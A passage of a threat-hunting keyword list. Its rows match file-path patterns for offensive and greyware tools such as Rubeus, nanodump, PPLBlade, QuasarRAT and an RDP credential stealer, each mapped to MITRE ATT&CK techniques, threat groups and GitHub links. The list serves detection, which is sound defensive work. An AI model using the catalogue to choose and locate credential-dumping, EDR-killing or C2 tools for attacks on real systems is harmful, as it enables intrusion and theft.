T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,0,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*\PowerView3.*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,0,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z -*\ppl_dump.*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*\PPLBlade-main*,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,0,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -*\PPLFault*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,0,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*\PPLKiller*,offensive_tool_keyword,PPLKiller,Tool to bypass LSA Protection (aka Protected Process Light),T1547.002 - T1558.003,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/RedCursorSecurityConsulting/PPLKiller,1,0,N/A,10,8,744,127,2022-12-04T23:38:31Z,2020-07-06T10:11:49Z -*\PrintSpoofer.cs*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,0,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z 
-*\PrintSpoofer-1.0.zip*,offensive_tool_keyword,printspoofer,Abusing impersonation privileges through the Printer Bug,T1134 - T1003 - T1055,TA0004 - TA0003 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,0,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*\PrivEditor\*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,0,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*\PrivescCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,0,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*\PrivKit\*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,0,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*\Process Hacker 2\*,greyware_tool_keyword,processhacker,Interactions with a objects present in windows such as threads stack - handles - gpu - services ? 
can be used by attackers to dump process - create services and process injection,T1055.001 - T1055.012 - T1003.001 - T1056.005,TA0005 - TA0040 - TA0006 - TA0009,N/A,N/A,Credential Access - Persistence - Defense Evasion,https://processhacker.sourceforge.io/,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*\process_killer.cpp*,offensive_tool_keyword,mhydeath,Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.,T1562.001,TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/zer0condition/mhydeath,1,0,N/A,10,3,251,47,2023-08-22T08:01:04Z,2023-08-22T07:15:36Z -*\ProduKey.exe*,offensive_tool_keyword,produkey,ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. and you want to reinstall it on your computer.,T1003.001 - T1003.002 - T1012 - T1057 - T1518,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/product_cd_key_viewer.html,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\Program Files\FreeFileSync*,greyware_tool_keyword,freefilesync,freefilesync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://freefilesync.org/download.php,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*\ProgramData\asrephashes.txt*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\ProgramData\shares.txt*,offensive_tool_keyword,powersploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*\ps2exe.ps1*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*\PS2EXE\*.ps1*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*\PsExecLog.log*,offensive_tool_keyword,GoFetch,GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Exploitation tools - AD Enumeration,https://github.com/GoFetchAD/GoFetch,1,0,N/A,10,7,615,126,2017-06-20T14:15:10Z,2017-04-11T10:45:23Z 
-*\PSPY.dll*,offensive_tool_keyword,NPPSpy,Simple code for NPLogonNotify(). The function obtains logon data including cleartext password,T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy,1,0,N/A,10,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*\PSPY.exe*,offensive_tool_keyword,NPPSpy,Simple code for NPLogonNotify(). The function obtains logon data including cleartext password,T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy,1,0,N/A,10,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*\PSRansom -*,offensive_tool_keyword,PSRansom,PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.,T1486 - T1107 - T1566.001,TA0011 - TA0010,N/A,N/A,Ransomware,https://github.com/JoelGMSec/PSRansom,1,0,N/A,N/A,4,371,95,2022-09-29T09:54:34Z,2022-02-27T11:52:03Z -*\Public\dcapi.dll*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,0,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*\public\klogging.log*,offensive_tool_keyword,undertheradar,scripts that afford the pentester AV bypass techniques,T1055.005 - T1027 - T1116 - T1070.004,TA0040 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/g3tsyst3m/undertheradar,1,0,N/A,9,1,7,0,2023-08-10T00:30:20Z,2023-07-01T17:59:20Z -*\Public\Music\RDPCreds.txt*,offensive_tool_keyword,RDPCredentialStealer,RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++,T1555.001 - T1059.002 - 
T1552.002,TA0006 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/S12cybersecurity/RDPCredentialStealer,1,0,N/A,10,2,196,34,2023-06-14T10:25:33Z,2023-06-13T01:30:26Z -*\pwn.exe*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\py2exe*,greyware_tool_keyword,py2exe,py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,Operation Wocao,N/A,Execution,https://github.com/py2exe/py2exe,1,0,greyware_tools high risks of false positives,N/A,7,646,83,2023-09-25T23:45:56Z,2019-03-11T13:16:35Z -*\pywsus.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*\Quasar.v*.zip*,offensive_tool_keyword,QuasarRAT,Free. 
Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.,T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060,TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/quasar/Quasar,1,0,N/A,N/A,10,7281,2269,2023-09-06T10:53:31Z,2014-07-08T12:27:59Z -*\Quasar-master*,offensive_tool_keyword,QuasarRAT,Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.,T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060,TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/quasar/Quasar,1,0,N/A,N/A,10,7281,2269,2023-09-06T10:53:31Z,2014-07-08T12:27:59Z -*\Ransomware.exe,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,0,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*\rarce.py*,offensive_tool_keyword,RaRCE,An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23,T1068 - T1203 - T1059.003,TA0001 - TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/ignis-sec/CVE-2023-38831-RaRCE,1,0,N/A,9,2,108,18,2023-08-27T22:17:56Z,2023-08-27T21:49:37Z -*\rasman.exe*,offensive_tool_keyword,RasmanPotato,using RasMan service for privilege escalation,T1548.002 - T1055.002 - T1055.001 ,TA0004 - 
TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/crisprss/RasmanPotato,1,0,N/A,10,4,353,54,2023-02-06T10:27:41Z,2023-02-06T09:41:51Z -*\RasmanPotato*,offensive_tool_keyword,RasmanPotato,using RasMan service for privilege escalation,T1548.002 - T1055.002 - T1055.001 ,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/crisprss/RasmanPotato,1,0,N/A,10,4,353,54,2023-02-06T10:27:41Z,2023-02-06T09:41:51Z -*\ratchatPT.go*,offensive_tool_keyword,ratchatpt,C2 using openAI API,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,0,risk of False positive,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*\ratchatPT.syso*,offensive_tool_keyword,ratchatpt,C2 using openAI API,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,0,risk of False positive,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*\RDPCredsStealerDLL*,offensive_tool_keyword,RDPCredentialStealer,RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++,T1555.001 - T1059.002 - T1552.002,TA0006 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/S12cybersecurity/RDPCredentialStealer,1,0,N/A,10,2,196,34,2023-06-14T10:25:33Z,2023-06-13T01:30:26Z -*\RealTimeSync.exe*,greyware_tool_keyword,freefilesync,freefilesync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://freefilesync.org/download.php,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*\Reaper\Reaper.cpp*,offensive_tool_keyword,reaper,Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.,T1547.009 - T1215 - T1129 - T1548.002,TA0002 - TA0003 - TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/MrEmpy/Reaper,1,0,N/A,10,1,61,18,2023-09-22T22:08:12Z,2023-09-21T02:09:48Z -*\Reaper-main\*.sys*,offensive_tool_keyword,reaper,Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.,T1547.009 - T1215 - T1129 - T1548.002,TA0002 - TA0003 - TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/MrEmpy/Reaper,1,0,N/A,10,1,61,18,2023-09-22T22:08:12Z,2023-09-21T02:09:48Z -*\REC2-main.zip*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,0,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*\Recon.tests.ps1*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*\RecycledGate.c*,offensive_tool_keyword,RecycledInjector,Native Syscalls Shellcode Injector,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/florylsk/RecycledInjector,1,0,N/A,N/A,3,213,35,2023-07-02T11:04:28Z,2023-06-23T16:14:56Z -*\RedPersist.exe*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*\RedPersist.pdb*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*\RedPersist.sln*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*\RedPersist-main\*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*\RemoteCamera.dll*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,0,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*\Resources\Disks-NoEncryption.txt*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure 
security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,0,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*\resources\PROCEXP.sys*,offensive_tool_keyword,Backstab,A tool to kill antimalware protected processes,T1107 - T1106 - T1543.004 ,TA0002 - TA0004 ,N/A,N/A,Defense Evasion,https://github.com/Yaxser/Backstab,1,0,N/A,N/A,10,1237,216,2021-06-19T20:01:52Z,2021-06-15T16:02:11Z -*\ROADtools\*,offensive_tool_keyword,ROADtools,A collection of Azure AD tools for offensive and defensive security purposes,T1136.003 - T1078.004 - T1021.006 - T1003.003,TA0002 - TA0004 - TA0005 - TA0006,N/A,N/A,Network Exploitation tools,https://github.com/dirkjanm/ROADtools,1,0,N/A,N/A,10,1353,206,2023-09-27T08:30:55Z,2020-03-28T09:56:08Z -*\rpcrt.py,offensive_tool_keyword,POC,Remote Code Execution Exploit in the RPC Library CVE-2022-26809,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/yuanLink/CVE-2022-26809,1,1,N/A,N/A,1,62,26,2022-05-25T00:57:52Z,2022-05-01T13:19:10Z -*\rpt_win.exe,offensive_tool_keyword,ratchatgpt,ratchatpt a tool using openai api as a C2,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,0,N/A,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*\rsocx.exe*,offensive_tool_keyword,rsocx,A bind/reverse Socks5 proxy server.,T1090.001 - T1090.002 - T1071.001,TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/b23r0/rsocx,1,0,N/A,10,10,319,146,2022-09-28T08:11:34Z,2015-05-13T04:02:55Z -*\Rubeus.*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*\Rubeus\*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*\ruler.exe*,offensive_tool_keyword,ruler,A tool to abuse Exchange services,T1102.001 - T1201.001 - T1570.002,TA0006,N/A,N/A,Exploitation tools,https://github.com/sensepost/ruler,1,1,N/A,N/A,10,1991,353,2021-02-19T09:28:07Z,2016-08-18T15:05:13Z -*\run\john *,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*\run\john\*.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*\run\john\*.com*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*\run\john\*.pl*,offensive_tool_keyword,john,John the Ripper 
jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*\run\john\*.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*\RunasCs.cs*,offensive_tool_keyword,RunasCs,RunasCs - Csharp and open version of windows builtin runas.exe,T1059.003 - T1059.001 - T1035,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs/,1,0,N/A,6,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*\RunBOF.exe*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,0,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*\RunOF.exe*,offensive_tool_keyword,cobaltstrike,A tool to run object 
files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,0,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*\RunOF\bin\*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - 